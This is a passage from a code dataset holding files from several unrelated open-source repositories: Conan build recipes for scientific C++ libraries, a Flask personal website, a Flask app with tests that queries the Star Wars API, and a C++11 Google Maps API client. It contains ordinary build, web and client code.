extracted_dir = \"mongo-cxx-driver-r{0}\".format(self.version)\n os.rename(extracted_dir, self._source_subfolder)\n\n # Mongo-c-driver does not cleanly handle its dependencies\n # Neither the newer autoconfigured config files nor the deprecated old\n # ones properly specify static library dependencies (like dl for\n # openssl) so we add it here.\n if tools.os_info.is_linux:\n path = os.path.join(self._source_subfolder, \"src\", \"mongocxx\")\n tools.patch(base_path=path, patch_file=\"link_dl.patch\")\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n\n self._cmake = CMake(self)\n self._cmake.definitions[\"BSONCXX_POLY_USE_MNMLSTC\"] = self.options.polyfill == \"mnmlstc\"\n self._cmake.definitions[\"BSONCXX_POLY_USE_STD_EXPERIMENTAL\"] = self.options.polyfill == \"experimental\"\n self._cmake.definitions[\"BSONCXX_POLY_USE_BOOST\"] = self.options.polyfill == \"boost\"\n\n if tools.os_info.is_linux:\n self._cmake.definitions[\"CMAKE_MODULE_LINKER_FLAGS\"] = \"-ldl\"\n self._cmake.definitions[\"CMAKE_EXE_LINKER_FLAGS\"] = \"-ldl\"\n\n self._cmake.configure(source_dir=self._source_subfolder)\n return self._cmake\n\n def build(self):\n conan_magic_lines = '''project(MONGO_CXX_DRIVER LANGUAGES CXX)\n include(../conanbuildinfo.cmake)\n conan_basic_setup()\n '''\n\n if self.settings.compiler == \"Visual Studio\":\n conan_magic_lines += \"add_definitions(-D_ENABLE_EXTENDED_ALIGNED_STORAGE)\"\n\n cmake_file = os.path.join(self._source_subfolder, \"CMakeLists.txt\")\n tools.replace_in_file(\n cmake_file, \"project(MONGO_CXX_DRIVER LANGUAGES CXX)\", conan_magic_lines)\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n\n def package_info(self):\n # Need to ensure mongocxx is linked before bsoncxx\n self.cpp_info.libs = sorted(tools.collect_libs(self), reverse=True)\n self.cpp_info.includedirs.extend(\n [os.path.join(\"include\", x, \"v_noabi\") for x in [\"bsoncxx\", \"mongocxx\"]])\n\n if self.options.polyfill == \"mnmlstc\":\n self.cpp_info.includedirs.append(os.path.join(\n \"include\", \"bsoncxx\", \"third_party\", \"mnmlstc\"))\n\n if not self.options.shared:\n self.cpp_info.defines.extend([\"BSONCXX_STATIC\", \"MONGOCXX_STATIC\"])\n"
},
{
"alpha_fraction": 0.7731958627700806,
"alphanum_fraction": 0.7835051417350769,
"avg_line_length": 23.25,
"blob_id": "66d6bfd9aa53cf1e57d6d9f8b483b40c9fc1e278",
"content_id": "ab5b42d0cebd336d70777b28d194f928dc684919",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 194,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 8,
"path": "/serenity/CMakeLists.txt",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.6)\nproject(cmake_wrapper)\n\ninclude(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\nconan_basic_setup()\n\nenable_testing()\nadd_subdirectory(${CMAKE_BINARY_DIR}/sources)\n"
},
{
"alpha_fraction": 0.5647497177124023,
"alphanum_fraction": 0.6106743812561035,
"avg_line_length": 35.07462692260742,
"blob_id": "3adcfc82836be9d53656328462d3e8cc0ae2770d",
"content_id": "6d869110ae22de0ade9b3ad56315a2622feb3608",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2417,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 67,
"path": "/artifactory-scripts/rehost.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom conans.client.command import Command, Conan\nimport sys\n\nrehost_packages = [\n \"boost_assert/1.69.0@bincrafters/stable\",\n \"boost_base/1.69.0@bincrafters/stable\",\n \"boost_config/1.69.0@bincrafters/stable\",\n \"boost_container_hash/1.69.0@bincrafters/stable\",\n \"boost_core/1.69.0@bincrafters/stable\",\n \"boost_detail/1.69.0@bincrafters/stable\",\n \"boost_integer/1.69.0@bincrafters/stable\",\n \"boost_move/1.69.0@bincrafters/stable\",\n \"boost_optional/1.69.0@bincrafters/stable\",\n \"boost_predef/1.69.0@bincrafters/stable\",\n \"boost_preprocessor/1.69.0@bincrafters/stable\",\n \"boost_smart_ptr/1.69.0@bincrafters/stable\",\n \"boost_static_assert/1.69.0@bincrafters/stable\",\n \"boost_throw_exception/1.69.0@bincrafters/stable\",\n \"boost_type_traits/1.69.0@bincrafters/stable\",\n \"boost_utility/1.69.0@bincrafters/stable\",\n \"icu/63.1@bincrafters/stable\",\n \"sqlite3/3.27.2@bincrafters/stable\",\n \"sqlitecpp/2.4.0@bincrafters/stable\",\n \"yaml-cpp/0.6.3@_/_\",\n \"openssl/1.1.1g@_/_\",\n \"boost/1.71.0@conan/stable\",\n \"bzip2/1.0.8@conan/stable\",\n \"eigen/3.3.7@conan/stable\",\n \"lapack/3.7.1@conan/stable\",\n \"zlib/1.2.11@conan/stable\",\n \"gtest/1.10.0@_/_\",\n \"cmake/3.17.3@_/_\"\n]\n\nif __name__ == \"__main__\":\n target_remote = sys.argv[1]\n conan_api, _, _ = Conan.factory()\n # for pkg in rehost_packages:\n for pkg in rehost_packages:\n # Which remote should we be getting this from?\n remote = None\n if \"bincrafters\" in pkg:\n remote = \"bincrafters\"\n else:\n remote = \"conan-center\"\n\n install_args = [\"install\", \"-r\", remote,\n \"--build=missing\", pkg]\n\n print(\"conan {}\".format(\" \".join(install_args)))\n cmd = Command(conan_api)\n error = cmd.run(install_args)\n if error != 0:\n raise RuntimeError(\"Result is not zero, but {}\".format(error))\n\n upload_args = [\"upload\", \"-r\", target_remote,\n \"--all\", \"-c\", pkg]\n print(\"conan {}\".format(\" \".join(upload_args)))\n cmd = Command(conan_api)\n error = cmd.run(upload_args)\n if error != 0:\n raise RuntimeError(\"Result is not zero, but {}\".format(error))\n"
},
{
"alpha_fraction": 0.5931850075721741,
"alphanum_fraction": 0.6029207110404968,
"avg_line_length": 26.653846740722656,
"blob_id": "09a72c836fc0b617041f7788981557abbc0a832c",
"content_id": "3d93b6ef74f3eb5583c72338f764eeff856a355c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1438,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 52,
"path": "/nauty/conanfile.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nimport os\nfrom conans import ConanFile, CMake, tools\n\n\nclass NautyConanfile(ConanFile):\n name = \"nauty\"\n version = \"2.7r1\"\n description = \"Graph Canonical Labeling and Automorphism Group Computation\"\n topics = (\"conan\", \"math\", \"graph\")\n url = \"http://pallini.di.uniroma1.it\"\n license = \"Apache-2.0\"\n exports_sources = [\n \"CMakeLists.txt\",\n \"config.cmake.in\"\n ]\n generators = \"cmake\"\n\n settings = \"os\", \"compiler\", \"arch\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False]\n }\n default_options = {\"shared\": False, \"fPIC\": True}\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def source(self):\n remote = \"http://pallini.di.uniroma1.it/nauty27r1.tar.gz\"\n tools.get(remote)\n os.rename(\"nauty27r1\", \"sources\")\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.configure()\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"sources/COPYRIGHT\",\n dst=\"licenses\", keep_path=False)\n cmake = self._configure_cmake()\n cmake.install()\n"
},
{
"alpha_fraction": 0.5998950004577637,
"alphanum_fraction": 0.6096088290214539,
"avg_line_length": 32.41228103637695,
"blob_id": "354824aa0edfbafb3e163b4cdbfd5b9f49509aa9",
"content_id": "14a92e33bc4d84c15e10a783b7997bf6c3c795b8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3809,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 114,
"path": "/serenity/conanfile.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nimport os\nfrom conans import ConanFile, CMake, tools\nimport shutil\n\n\n\ndef microarch(conanfile):\n \"\"\" Determine microarch of compiler and os (CPU chipset family or ISA) \"\"\"\n cmdlist = None\n regex = None\n\n # Note that it doesn't matter if gcc or clang have different names for what\n # we call microarchitecture here. Any package ID is a hash convolution of\n # os, compiler, and then the microarch string. Collisions are so unlikely\n # they're impossible.\n\n if conanfile.settings.compiler == \"gcc\":\n cmdlist = [\"gcc\", \"-march=native\", \"-Q\", \"--help=target\"]\n regex = r\"-march=\\s+(?P<arch>[A-z0-9]+)\"\n\n if conanfile.settings.compiler in [\"clang\", \"apple-clang\"]:\n cmdlist = [\"clang\", \"-march=native\", \"-xc\", \"-\", \"-###\"]\n regex = r\"\\\"-target-cpu\\\"\\\\s+\\\"(?P<arch>[A-z0-9]+)\\\"\"\n\n if cmdlist is None:\n return None\n\n result = sp.run(cmdlist, stdout=sp.PIPE,\n stderr=sp.STDOUT, universal_newlines=True)\n result.check_returncode()\n matcher = re.compile(regex)\n\n for match in matcher.finditer(result.stdout):\n return match.group(\"arch\")\n\n for match in matcher.finditer(result.stderr):\n return match.group(\"arch\")\n\n return None\n\n\nclass SerenityConanfile(ConanFile):\n name = \"serenity\"\n version = \"1.3.0\"\n description = \"Serenity: A subsystem quantum chemistry program.\"\n topics = (\"conan\", \"quantum-chemistry\", \"chemistry\")\n url = \"https://github.com/qcserenity/serenity\"\n license = \"LGPL-3.0\"\n exports_sources = \"CMakeLists.txt\"\n generators = \"cmake\"\n exports = \"serenity.patch\"\n\n settings = \"os\", \"compiler\", \"arch\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"tests\": [True, False],\n \"microarch\": [\"detect\", \"none\"]\n }\n default_options = {\"shared\": False, \"tests\": False, \"microarch\": \"none\"}\n build_requires = \"cmake/[>3.13.3]@scine/stable\"\n requires = [\n \"zlib/[~=1.2.11]\",\n \"hdf5/[=1.12.0]@scine/stable\",\n \"eigen/[~=3.3.7]@conan/stable\",\n \"boost/[>1.58.0]@conan/stable\"\n ]\n\n def source(self):\n self.run(\"git clone https://github.com/qcserenity/serenity\")\n self.run(\"cd serenity && git checkout 1.3.0\")\n shutil.move(\"serenity\", \"sources\")\n\n tools.patch(base_path=\"sources\", patch_file=\"serenity.patch\")\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"SERENITY_ENABLE_TESTS\"] = self.options.tests\n if self.options.microarch == \"none\":\n cmake.definitions[\"SERENITY_MARCH\"] = \"\"\n else:\n cmake.definitions[\"SERENITY_MARCH\"] = microarch(self) or \"\"\n cmake.definitions[\"HDF5_USE_STATIC_LIBRARIES\"] = not self.options['hdf5'].shared\n cmake.definitions[\"HDF5_ROOT\"] = self.deps_cpp_info[\"hdf5\"].rootpath\n cmake.configure()\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"sources/LICENSE\",\n dst=\"licenses\", keep_path=False)\n cmake = self._configure_cmake()\n cmake.install()\n\n def package_id(self):\n # Remove test option from package id computation\n delattr(self.info.options, \"tests\")\n # Overwrite microarch value in info with detected or make it empty\n if \"microarch\" in self.options:\n if self.options.get_safe(\"microarch\") == \"detect\":\n self.info.options.microarch = microarch(self) or \"\"\n else:\n self.info.options.microarch = \"\"\n\n\n def package_info(self):\n pass\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6142857074737549,
"avg_line_length": 16.5,
"blob_id": "928da89870d5c89633a9ba4767b285858c1cdd35",
"content_id": "7b16047ae59e3ed0e49c585fbab7ee3c17bcd143",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 140,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 8,
"path": "/CHANGELOG.rst",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "=========\nChangelog\n=========\n\nRelease 1.0.0\n=============\n\nInitial release with all necessary functionality to support Molassembler 1.0.0.\n"
}
] | 13 |
AhmedSa-mir/swapi-search | https://github.com/AhmedSa-mir/swapi-search | b917c589583dde8af3445ecb3217eb379718f22e | ea0ca83716151705adca9da5121721ba2f43f4e7 | 3ade87807ec31d2df1bbc3408371bab2e1942701 | refs/heads/master | 2020-12-28T10:36:35.331458 | 2020-02-04T21:11:44 | 2020-02-04T21:11:44 | 238,292,985 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6968421339988708,
"alphanum_fraction": 0.7094736695289612,
"avg_line_length": 12.571428298950195,
"blob_id": "0566adbaf48a12ed3e3a171846e06ede55328a61",
"content_id": "ee97534d2c119d691726658a01a485df9d4cc483",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 475,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 35,
"path": "/README.md",
"repo_name": "AhmedSa-mir/swapi-search",
"src_encoding": "UTF-8",
"text": "# SWAPI Search\nA simple flask app using SWAPI\n\n\n## Installation\n\nClone repo\n```\ngit clone https://github.com/AhmedSa-mir/swapi-search\ncd swapi-search/\n```\nPrepare flask env\n```\npyvenv-3.5 env\nmv * env/\nsource env/bin/activate\npip install flask flask-cors requests pytest\ncd env/\n```\n\n\n## Run flask app\n```\ncd swapi_app/\npython app.py\n```\n\nOpen localhost:5000/ in your browser. This should load the index.html page in the templates dir\n\n\n## Run tests\n```\ncd tests/\npytest\n```\n"
},
{
"alpha_fraction": 0.6967213153839111,
"alphanum_fraction": 0.7103825211524963,
"avg_line_length": 25.178571701049805,
"blob_id": "e7f81068b14a3c3532267e90909b0966e0769735",
"content_id": "4863fe8da6755284fe3a3f37942ff5824c4a1033",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 28,
"path": "/tests/test_app.py",
"repo_name": "AhmedSa-mir/swapi-search",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom flask import Flask\nimport json\nimport sys\nsys.path.append('../swapi_app/')\t\nfrom app import *\n\[email protected]\ndef app_context():\n\twith app.app_context():\n\t\twith app.test_request_context():\n\t\t\tyield\n\tapp.config['Testing'] = True\n\ndef test_empty_name(app_context):\n\tresponse = get_character_info(\"\")\n\tassert response.status_code == 204\n\tassert response.data == b''\n\ndef test_invalid_name(app_context):\n\tresponse = get_character_info(\"Ahmed\")\n\tassert response.status_code == 200\n\tassert response.data == b'[]'\n\ndef test_valid_name(app_context):\n\tresponse = get_character_info(\"Luke\")\n\tassert response.status_code == 200\n\tassert all([\"luke\" in (a['name'].lower()) for a in json.loads(response.data.decode('utf-8'))])"
},
{
"alpha_fraction": 0.5705294609069824,
"alphanum_fraction": 0.5753424763679504,
"avg_line_length": 27.14583396911621,
"blob_id": "d6ed34e7541ba26ec2b047c15f6576abb74527a1",
"content_id": "a58c52d20e536e8da90b1442b68f3c4641340408",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2701,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 96,
"path": "/swapi_app/app.py",
"repo_name": "AhmedSa-mir/swapi-search",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, render_template\nfrom flask_cors import CORS, cross_origin\nfrom functools import wraps\nimport requests\nimport json\nimport time\nimport os\n\ntemplate_dir = os.path.abspath('../templates/')\nstatic_dir = os.path.abspath('../static/')\n\napp = Flask(__name__, template_folder=template_dir,static_folder=static_dir)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nSWAPI = \"https://swapi.co/api/\"\n\n\ndef print_timing(func):\n @wraps(func)\n def wrapper(*args,**kwargs):\n start = time.perf_counter()\n result = func(*args,**kwargs)\n end = time.perf_counter()\n fs = 'Function {} took {:.3f} seconds'\n print(fs.format(func.__name__, (end - start)))\n return result\n return wrapper\n\n\n@print_timing\ndef get_film_info(film):\n return requests.get(film).json()\n\n@print_timing\ndef get_homeworld_info(homeworld):\n return requests.get(homeworld).json()\n\n@print_timing\ndef get_species_info(species_api):\n return requests.get(species_api).json()\n\n@print_timing\ndef get_all_people_info():\n return requests.get(SWAPI + \"people/\").json()\n\[email protected]('/character_info/<charactername>')\n@cross_origin()\n@print_timing\ndef get_character_info(charactername):\n if(charactername == \"\"):\n return('', 204)\n ret = []\n\n response = get_all_people_info();\n if(response == {'detail': 'Not found'}):\n return (json.dumps(ret), 204)\n else:\n for char in response['results']:\n if(charactername.lower() in char['name'].lower()):\n \n info = {}\n\n info[\"name\"] = char['name']\n info[\"gender\"] = char['gender']\n\n species_names = []\n species_lifespan = []\n for species_api in char['species']:\n \tspecies_info = get_species_info(species_api);\n \tspecies_names.append(species_info['name'])\n \tspecies_lifespan.append(species_info['average_lifespan'])\n info[\"species\"] = species_names\n info[\"average_lifespan\"] = species_lifespan\n\n homeworld = get_homeworld_info(char['homeworld'])\n info[\"homeworld\"] = homeworld['name']\n\n films = []\n for film in char['films']:\n \tfilm_info = get_film_info(film)\n \tfilms.append(film_info['title'])\n info[\"films\"] = films\n\n ret.append(info)\n\n if(not ret):\n return ('[]', 200)\n return (json.dumps(ret),200)\n\[email protected](\"/\")\ndef home():\n return render_template('index.html', title='SWAPI SEARCH')\n\nif __name__ == \"__main__\":\n app.run(debug = True)"
}
] | 3 |
jlazaro135/Fakebook-bueno | https://github.com/jlazaro135/Fakebook-bueno | 470ee8e25d0efef94c617864767d79d6b5b524c7 | 8229e66cc57bc3c2bcf21941f37f0efb6ad02487 | 1f205e0601170c44034a0d3136e2e9241f45a47f | refs/heads/master | 2023-05-10T23:45:59.688405 | 2019-11-19T23:35:53 | 2019-11-19T23:35:53 | 212,648,982 | 0 | 1 | null | 2019-10-03T18:21:32 | 2019-11-19T23:36:02 | 2023-05-02T17:57:05 | HTML | [
{
"alpha_fraction": 0.6590909361839294,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 16.639999389648438,
"blob_id": "9e8b8146c9a58940a5e32c5627001143fcabe63e",
"content_id": "de2a2acf9612ef19a9a53f928204d8cfbf1ec16a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 25,
"path": "/main.py",
"repo_name": "jlazaro135/Fakebook-bueno",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template\n\napp = Flask(__name__)\n\[email protected](\"/\")\ndef index():\n return render_template(\"index.html\")\n\[email protected](\"/aficiones\")\ndef aficiones():\n return render_template(\"aficiones.html\")\n\n\[email protected](\"/portfolio\")\ndef portfolio():\n return render_template(\"portfolio.html\")\n\[email protected](\"/contacto\")\ndef contacto():\n return render_template(\"contacto.html\")\n\n\n\nif __name__ == '__main__':\n app.run()"
},
{
"alpha_fraction": 0.6658097505569458,
"alphanum_fraction": 0.6805912852287292,
"avg_line_length": 58.88461685180664,
"blob_id": "707a7a6ab0eeb02b8a6983d80146e9fd6977441a",
"content_id": "78d1034054de1407031111ab696ebb064756c09d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 338,
"num_lines": 26,
"path": "/templates/index.html",
"repo_name": "jlazaro135/Fakebook-bueno",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block title%}\n <title>Jesús Lázaro</title>\n{% endblock title %}\n\n{% block content %}\n <h1>Jesús Lázaro</h1>\n <h2>Espacio Personal</h2>\n\n\n<div class=\"box\">\n <div id=\"intro-1\">\n <img class=\"image\" src=\"https://drive.google.com/uc?export=view&id=1DD6lbgvYpoHHUpV-JO41dgNH-fyxWxNk\" alt=\"foto perfil\" onmouseover=\"this.src='https://drive.google.com/uc?export=view&id=1-ySeydL24wWUKUAgipESYfUd_93WRyRW'\" onmouseout=\"this.src='https://drive.google.com/uc?export=view&id=1DD6lbgvYpoHHUpV-JO41dgNH-fyxWxNk'\">\n </div>\n <div id=\"intro-2\">\n <p>Licenciado en Psicología, realicé el master de <a href=\"https://www.ub.edu/web/ub/es/estudis/oferta_formativa/master_universitari/fitxa/M/MD504/index.html\" title=\"MIM-UB\" target=\"blank\">Marketing e Investigación de Mercados</a> en la Universitat de Barcelona. Actualmente trabajo en el sector\n de la distribución y el gran consumo, dentro del departamento de marketing de Tiendanimal, una empresa <a href=\"https://economipedia.com/definiciones/category-killer.html\" title=\"¿Qué es un Cateogry Killer?\" target=\"blank\">Category Killer</a> focalizada en la distribución de artículos y prestación de servicios para mascotas.\n </p>\n </div>\n <div id=\"intro-2\">\n <p><a href=\"/aficiones\" title=\"aficiones\" target=\"_self\"> AFICIONES </a> <a href=\"/portfolio\" title=\"Portfolio\" target=\"_self\"> PORTFOLIO </a> <a href=\"/contacto\" title=\"Contacto\" target=\"_self\"> CONTACTO </a>\n </p>\n </div>\n</div>\n{% endblock content %}"
}
] | 2 |
amrfaissal/gmaps11 | https://github.com/amrfaissal/gmaps11 | d6e5fe686f275d353b7cb87272a3bf71f83273bf | 0991f1cc0f06e35e7eeb6b0e1e22f562a365e24a | 80d7fdf26d216a6c4a3871432c435df421f08188 | refs/heads/master | 2020-04-04T17:28:59.471721 | 2016-10-22T14:41:08 | 2016-10-22T14:41:08 | 40,979,836 | 4 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6901777982711792,
"alphanum_fraction": 0.707956850528717,
"avg_line_length": 32.970298767089844,
"blob_id": "c122201237b2779974b64a5c4c908f2423a848ff",
"content_id": "8b648caecd2a13eb1cd4d40fce66b5269f5e4314",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3431,
"license_type": "permissive",
"max_line_length": 175,
"num_lines": 101,
"path": "/README.md",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "# C++11 Client for Google Maps Web Services\n\n[](https://travis-ci.org/amrfaissal/gmaps11)\n\n## Description\n\nThis library brings the Google Maps API Web Services to your C++11 application.\n\nThe C++11 Client for Google Maps Services is a C++11 Client library for the following Google Maps APIs:\n\n - [Directions API]\n - [Distance Matrix API]\n - ~~Elevation API~~\n - ~~Geocoding API~~\n - ~~Time Zone API~~\n - ~~Roads API~~\n - ~~Places API~~\n\n## Latest Stable Version\n\nThe latest stable version of the library can be found at:\n- <https://github.com/amrfaissal/gmaps11/releases/latest>\n\n## Getting started\n\n### Building and Installing\n\n#### Dependencies\n\n- [CMake v2.8 or better](http://www.cmake.org/)\n- A C++11 compiler (GCC 4.8+, clang)\n- [CURL](http://curl.haxx.se/) library\n- [CURLcpp](https://github.com/AmrFaissal/curlcpp) C++ wrapper for CURL\n- [Boost library](http://www.boost.org) version 1.54.0+\n\nAfter downloading and extracting the source from a tarball to a directory, the commands to build `gmaps11` on most systems are:\n\n mkdir build && cd build\n cmake ..\n cmake --build .\n\nInstalling the library and optionally specifying a prefix can be done with:\n\n cmake -DCMAKE_INSTALL_PREFIX=/usr/local ..\n cmake --build . --target install\n\nMore information on CMake can be found on its [FAQ](http://www.cmake.org/Wiki/CMake_FAQ).\n\n## Examples\n\nBefore we dive into examples, please make sure you have a `gmaps11.config` configuration file in the root of your project.\n\n> `gmaps11.config` is JSON configuration file used by the C++11 client.\n\n### Google Directions API\n\nThe [Google Directions API](https://developers.google.com/maps/documentation/directions/intro) is a service that calculates directions between locations using an HTTP request.\n\n`gmaps11` comes with a `DirectionsService` class to help you query The [Google Directions API]:\n\n```cpp\n #include <gmaps11/directions.hpp>\n #include <boost/scoped_ptr.hpp>\n #include <iostream>\n\n using namespace googlemaps;\n\n auto main() -> int {\n boost::scoped_ptr<DirectionsService> directions_service(new DirectionsService());\n // Query the Google Maps Directions API\n // *NOTE* 'waypoint_t' is a typdef for boost::variant which can be a\n // string holding a name (city, place...) or a boost tuple holding lat and long\n // of a position\n std::string response = directions_service->query(\"Paris\", boost::make_tuple(44.051682, 4.643433), \"driving\");\n // Print the JSON response\n std::cout << response << std::endl;\n }\n```\n\n## Notes\n\nYou can parse the JSON response using the JSON parser in `gmaps11/json/json11.hpp` header:\n\n```cpp\n std::string err;\n json11::Json json_body = json11::Json::parse(response, err);\n if (err.empty()) { // JSON response is valid\n std::string __status__ = json_body[\"status\"].string_value();\n }\n```\n\n## Contributing\n\nBug reports, Pull requests and Stars are always welcome. For bugs and feature requests, [please create an issue](https://github.com/amrfaissal/gmaps11/issues/new).\n\n## License\n\nThe library is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).\n\n[Directions API]: https://developers.google.com/maps/documentation/directions/\n[Distance Matrix API]: https://developers.google.com/maps/documentation/distancematrix/\n"
},
{
"alpha_fraction": 0.6677085757255554,
"alphanum_fraction": 0.6727578639984131,
"avg_line_length": 31.4921875,
"blob_id": "7f9aea4042d2781f6d6203121728b9a95b06284c",
"content_id": "5c2751f573d5301acd2dbdd3f70faaa535d37895",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8318,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 256,
"path": "/src/http_client.cc",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "#include \"http/http_client.hpp\"\n\nusing namespace http;\nusing namespace meta;\nnamespace py = boost::python;\n\n\nClient::Client(std::string key, std::string client_id,\n\t\tstd::string client_secret, int timeout, int connect_timeout, int retry_timeout) {\n\n\tif (key.empty() && (client_id.empty() && client_secret.empty())) {\n\t\tthrow std::domain_error(\n\t\t\t\t\"Must provide API key or enterprise credentials when creating client.\");\n\t}\n\n\tif (!key.empty() && !boost::starts_with(key, \"AIza\")) {\n\t\tthrow std::domain_error(\"Invalid API key provided.\");\n\t}\n\n\tthis->key_ = key;\n\n\tif (timeout > 0 && connect_timeout > 0) {\n\t\tthrow std::domain_error(\"Specify either timeout, or connect_timeout.\");\n\t}\n\n\tif (connect_timeout > 0) {\n\t\tthis->connect_timeout_ = connect_timeout;\n\t} else {\n\t\tthis->timeout_ = timeout;\n\t}\n\n\tthis->client_id_ = client_id;\n\tthis->client_secret_ = client_secret;\n\tthis->retry_timeout_ = retry_timeout;\n\n\ttry\n\t{\n\t\tPy_Initialize();\n\t\t// We can insert the module working directory into the Python path\n\t\t// so module search can take advantage, but the module is already\n\t\t// installed using CMake.\n\t\tthis->crypto_mod_ = py::import(\"crypto\");\n\t}\n\tcatch (boost::python::error_already_set const &)\n\t{\n\t\tstd::string perror_str = parse_python_exception();\n\t\tstd::cerr << perror_str << std::endl;\n\t}\n}\n\nstd::string Client::urlencode_params(const UrlParams & params) {\n\tstd::stringstream ss;\n\tstd::vector<std::string> _out_;\n\tfor (const std::pair<std::string,std::string>& params_pair: params) {\n\t\tss << params_pair.first << \"=\" << params_pair.second;\n\t\t_out_.push_back(ss.str());\n\t\tss.str(\"\");\n\t}\n\treturn boost::algorithm::join(_out_, \"&\");\n}\n\nstd::string Client::sign_url(std::string secret, std::string url_payload) {\n\tconst char * _sig_ = nullptr;\n\ttry\n\t{\n\t\tpy::object _sigobj_ = crypto_mod_.attr(\"url_signer\")(url_payload, secret);\n\t\t_sig_ = py::extract<const char*>(py::str(_sigobj_));\n\t}\n\tcatch (boost::python::error_already_set const &) {\n\t\tstd::string perror_str = parse_python_exception();\n\t\tstd::cerr << perror_str << std::endl;\n\t}\n\treturn std::string(_sig_);\n}\n\nstd::string Client::generate_auth_url(std::string path, UrlParams params,\n\t\tbool accepts_clientid) {\n\tstd::stringstream ss;\n\n\tif (accepts_clientid && !client_id_.empty() && !client_secret_.empty()) {\n\t\tparams[\"client\"] = client_id_;\n\n\t\t// Build URL with encoded parameters\n\t\tss << path << \"?\" << urlencode_params(params);\n\t\tstd::string urlToSign = ss.str();\n\n\t\t// Sign the builded URL\n\t\tstd::string signature = sign_url(client_secret_, urlToSign);\n\t\tss.str(\"\"); // Reset string stream\n\t\tss << googleapis_BASE_URL << urlToSign << \"&signature=\" << signature;\n\n\t\treturn ss.str();\n\t}\n\n\tif (!key_.empty()) {\n\t\tparams[\"key\"] = key_;\n\t\tss << googleapis_BASE_URL << path << \"?\" << urlencode_params(params);\n\t\treturn ss.str();\n\t}\n\tthrow std::domain_error(\"Must provide API key for this API. \"\n\t\t\t\"It does not accept enterprise credentials.\");\n}\n\nstd::string Client::get_body(std::string response) {\n\tstd::string err;\n\tjson11::Json json_body = json11::Json::parse(response, err);\n\tif (!err.empty())\n\t\tthrow std::domain_error(\"Bad JSON while parsing body: \" + err);\n\n\tstd::string api_status = json_body[\"status\"].string_value();\n\tif (api_status == \"OK\" || api_status == \"ZERO_RESULTS\") {\n\t\treturn json_body.dump();\n\t}\n\n\tif (api_status == \"OVER_QUERY_LIMIT\") {\n\t\tthrow googlemaps::exceptions::retriable_request_error();\n\t}\n\n\t// 